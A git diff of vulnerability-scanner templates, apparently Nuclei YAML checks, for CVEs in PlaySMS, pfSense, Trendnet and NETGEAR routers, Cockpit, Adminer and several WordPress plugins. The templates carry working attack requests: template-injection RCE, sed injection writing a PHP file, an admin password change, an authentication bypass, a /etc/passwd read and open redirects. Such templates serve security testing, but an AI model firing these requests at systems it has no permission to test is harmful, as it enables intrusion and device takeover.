0bd51729fb..81151b66a4 100644 --- a/poc/cve/cve-2020-27866.yaml +++ b/poc/cve/cve-2020-27866.yaml @@ -4,8 +4,8 @@ info: name: NETGEAR Authentication Bypass vulnerability author: gy741 severity: high - description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, - Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + tags: cve,cve2020,netgear,auth-bypass reference: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ @@ -13,10 +13,9 @@ info: - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2020-27866 cwe-id: CWE-288 - tags: cve,cve2020,netgear,auth-bypass requests: - raw: diff --git a/poc/cve/cve-2020-35846.yaml b/poc/cve/cve-2020-35846.yaml index ed4b8dd6b7..b012cee002 100644 --- a/poc/cve/cve-2020-35846.yaml +++ b/poc/cve/cve-2020-35846.yaml @@ -1,4 +1,4 @@ -id: cve-2020-35846 +id: CVE-2020-35846 info: name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check @@ -8,7 +8,12 @@ info: Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ - tags: cve,cve2020,nosqli,sqli + tags: cve,cve2020,nosqli,sqli,cockpit,injection + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35846 + cwe-id: CWE-89 requests: - method: POST diff --git a/poc/cve/cve-2020-36365.yaml b/poc/cve/cve-2020-36365.yaml index c3116b81e6..771c887368 100644 --- a/poc/cve/cve-2020-36365.yaml +++ b/poc/cve/cve-2020-36365.yaml @@ -1,43 +1,31 @@ id: CVE-2020-36365 info: - name: Smartstore <4.1.0 - Open Redirect + name: Smartstore < 4.1.0 - Open redirect author: 0x_Akoko severity: medium - description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. + description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 + - https://www.cvedetails.com/cve/CVE-2020-36365 - https://github.com/smartstore/SmartStoreNET - - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-36365 cwe-id: CWE-601 - epss-score: 0.00244 - epss-percentile: 0.62379 - cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: smartstore - product: smartstorenet shodan-query: http.html:'content="Smartstore' - tags: cve2020,cve,redirect,smartstore + tags: cve,cve2020,redirect,smartstore -http: +requests: - method: GET + path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2020-8644.yaml b/poc/cve/cve-2020-8644.yaml index aae9417521..6d66fa8fa8 100644 --- a/poc/cve/cve-2020-8644.yaml +++ b/poc/cve/cve-2020-8644.yaml @@ -5,36 +5,24 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. - impact: | - Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. - remediation: | - Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html - - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-94 - epss-score: 0.96028 - epss-percentile: 0.99356 - cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: playsms - product: playsms - tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce + cwe-id: CWE-74 + tags: cve,cve2020,ssti,playsms,rce,unauth,kev -http: +requests: - raw: - | GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -43,11 +31,21 @@ http: X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= + cookie-reuse: true host-redirects: true max-redirects: 2 + extractors: + - type: xpath + name: csrf + part: body + attribute: value + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: + - type: word part: body words: @@ -57,12 +55,4 @@ http: status: - 200 - extractors: - - type: xpath - name: csrf - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input - attribute: value - part: body -# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/07/07 \ No newline at end of file diff --git a/poc/cve/cve-2020-8772.yaml b/poc/cve/cve-2020-8772.yaml index beccc40018..0036ff439d 100644 --- a/poc/cve/cve-2020-8772.yaml +++ b/poc/cve/cve-2020-8772.yaml @@ -1,83 +1,19 @@ id: CVE-2020-8772 info: - name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass - author: princechaddha,scent2d + name: InfiniteWP Improper Authentication + author: medbsq severity: critical - description: | - WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can gain unauthorized administrative access to the WordPress site. - remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. - reference: - - https://wpscan.com/vulnerability/10011 - - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - - https://wpvulndb.com/vulnerabilities/10011 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 - - https://github.com/ChoiSG/vwp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8772 - cwe-id: CWE-862 - epss-score: 0.96607 - epss-percentile: 0.99546 - cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* - metadata: - verified: true - max-request: 2 - vendor: revmakx - product: infinitewp_client - framework: wordpress - tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx -http: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} - - host-redirects: true - - matchers-condition: and +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==" matchers: - type: word - part: header words: - - "wordpress_logged_in" - - - type: word - part: body - words: - - "" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: username - group: 1 - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?' - part: body -# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/05 diff --git a/poc/cve/cve-2021-20158.yaml b/poc/cve/cve-2021-20158.yaml index 41df85c9ff..cea4234f03 100644 --- a/poc/cve/cve-2021-20158.yaml +++ b/poc/cve/cve-2021-20158.yaml @@ -1,49 +1,41 @@ id: CVE-2021-20158 info: - name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change + name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. - impact: | - An attacker with authenticated access can gain unauthorized control over the affected device. - remediation: | - Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-20158 - cwe-id: CWE-306 - epss-score: 0.01211 - epss-percentile: 0.83754 - cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* + cwe-id: CWE-287 metadata: - max-request: 2 - vendor: trendnet - product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" - tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet -variables: - password: "{{rand_base(6)}}" + tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos -http: +requests: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}} + ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= + html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word part: body words: @@ -58,7 +50,4 @@ http: words: - "text/html" - - type: status - status: - - 200 -# digest: 4a0a00473045022026f2cb4d546143dddc1646a081ebfaeecf087f82b9adc26ae239313b24dc4a4d0221008e2cbba77ac00dde9277de789229bd07830e4a7b7c25c58778ac3c9b1ddeddb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by cs on 2022/02/25 diff --git a/poc/cve/cve-2021-21311.yaml b/poc/cve/cve-2021-21311.yaml index deec236dce..fc48ecd2fb 100644 --- a/poc/cve/cve-2021-21311.yaml +++ b/poc/cve/cve-2021-21311.yaml @@ -1,69 +1,34 @@ id: CVE-2021-21311 info: - name: Adminer <4.7.9 - Server-Side Request Forgery - author: Adam Crosser,pwnhxl + name: Adminer SSRF Using Verbose Error Messages + author: Adam Crosser severity: high - description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. - remediation: Upgrade to version 4.7.9 or later. + description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9. reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - - https://packagist.org/packages/vrana/adminer - - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 - - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 + metadata: + shodan-query: title:"Login - Adminer" + tags: cve,cve2021,adminer,ssrf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-score: 7.20 cve-id: CVE-2021-21311 cwe-id: CWE-918 - epss-score: 0.01485 - epss-percentile: 0.85417 - cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* - metadata: - max-request: 6 - vendor: adminer - product: adminer - shodan-query: title:"Login - Adminer" - fofa-query: app="Adminer" && body="4.7.8" - hunter-query: app.name="Adminer"&&web.body="4.7.8" - tags: cve2021,cve,adminer,ssrf -http: - - raw: - - | - POST {{path}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} - - payloads: - path: - - "/index.php" - - "/adminer.php" - - "/adminer/adminer.php" - - "/adminer/index.php" - - "/_adminer.php" - - "/_adminer/index.php" - - attack: batteringram - stop-at-first-match: true - redirects: true - max-redirects: 1 +requests: + - method: GET + path: + - "{{BaseURL}}/adminer?elastic=example.com&username=" matchers-condition: and matchers: + - type: status + status: + - 403 + - type: word part: body words: - - "400 - Bad Request" - "<title>400 - Bad Request</title>" - condition: or - - - type: status - status: - - 403 -# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24926.yaml b/poc/cve/cve-2021-24926.yaml index 8e4826b49b..7a8c1e8d7d 100644 --- a/poc/cve/cve-2021-24926.yaml +++ b/poc/cve/cve-2021-24926.yaml @@ -1,33 +1,19 @@ id: CVE-2021-24926 info: - name: WordPress Domain Check <1.0.17 - Cross-Site Scripting + name: WordPress Plugin Domain Check < 1.0.17 - XSS author: cckuailong severity: medium - description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page. - remediation: | - Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability. + description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. reference: - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2021-24926 cwe-id: CWE-79 - epss-score: 0.00171 - epss-percentile: 0.53153 - cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: domaincheckplugin - product: domain_check - framework: wordpress - tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -37,10 +23,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: - type: word @@ -53,4 +41,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24947.yaml b/poc/cve/cve-2021-24947.yaml index 9796ad8438..216a1e0d5a 100644 --- a/poc/cve/cve-2021-24947.yaml +++ b/poc/cve/cve-2021-24947.yaml @@ -3,34 +3,17 @@ id: CVE-2021-24947 info: name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read author: cckuailong - severity: medium - description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. - impact: | - An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. - remediation: | - Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. + severity: high + description: "WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server." reference: - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/kazet/wpgarlic classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 cve-id: CVE-2021-24947 - cwe-id: CWE-352,CWE-863 - epss-score: 0.00315 - epss-percentile: 0.69672 - cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: thinkupthemes - product: responsive_vector_maps - framework: wordpress - tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes + cwe-id: CWE-23 + tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -44,6 +27,7 @@ http: GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: - type: regex @@ -53,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/cve-2021-25074.yaml b/poc/cve/cve-2021-25074.yaml index 726e7dd13e..4475b6ef96 100644 --- a/poc/cve/cve-2021-25074.yaml +++ b/poc/cve/cve-2021-25074.yaml @@ -1,42 +1,25 @@ id: CVE-2021-25074 info: - name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect + name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect author: dhiyaneshDk severity: medium - description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue. - impact: | - An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. - remediation: | - Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed. - reference: - - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25074 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/ARPSyndicate/cvemon + description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue. + reference: https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 + tags: cve,cve2021,wordpress,redirect,wp-plugin,webpconverter classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-25074 cwe-id: CWE-601 - epss-score: 0.00106 - epss-percentile: 0.42122 - cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: webp_converter_for_media_project - product: webp_converter_for_media - framework: wordpress - tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project -http: +requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh" + - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2021-25111.yaml b/poc/cve/cve-2021-25111.yaml index 01f582930c..42b2530141 100644 --- a/poc/cve/cve-2021-25111.yaml +++ b/poc/cve/cve-2021-25111.yaml @@ -5,30 +5,17 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. - remediation: | - Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - https://nvd.nist.gov/vuln/detail/CVE-2021-25111 - - https://github.com/ARPSyndicate/kenzer-templates + tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-25111 cwe-id: CWE-601 - epss-score: 0.00106 - epss-percentile: 0.42122 - cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: english_wordpress_admin_project - product: english_wordpress_admin - framework: wordpress - tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project -http: +requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" @@ -37,5 +24,6 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by md on 2022/10/14 diff --git a/poc/cve/cve-2021-41282.yaml b/poc/cve/cve-2021-41282.yaml index 54567b4bd3..c337bf85a5 100644 --- a/poc/cve/cve-2021-41282.yaml +++ b/poc/cve/cve-2021-41282.yaml @@ -1,66 +1,55 @@ id: CVE-2021-41282 info: - name: pfSense - Arbitrary File Write + name: pfSense Arbitrary File Write to RCE author: cckuailong severity: high - description: | - diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall. - remediation: | - Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. + description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. reference: - https://www.shielder.it/advisories/pfsense-remote-command-execution/ - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ - - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 - - https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html + tags: cve,cve2021,pfsense,rce,authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2021-41282 - cwe-id: CWE-74 - epss-score: 0.97305 - epss-percentile: 0.9986 - cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* - metadata: - max-request: 4 - vendor: pfsense - product: pfsense - tags: cve2021,cve,pfsense,rce,authenticated + cwe-id: CWE-94 -http: +requests: - raw: - | GET /index.php HTTP/1.1 Host: {{Hostname}} + - | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login= + - | GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1 Host: {{Hostname}} + - | GET /test.php HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" - - "status_code==200" - condition: and - + cookie-reuse: true extractors: - type: regex name: csrf_token + part: body + internal: true group: 1 regex: - '(sid:[a-z0-9,;:]+)' - internal: true - part: body -# digest: 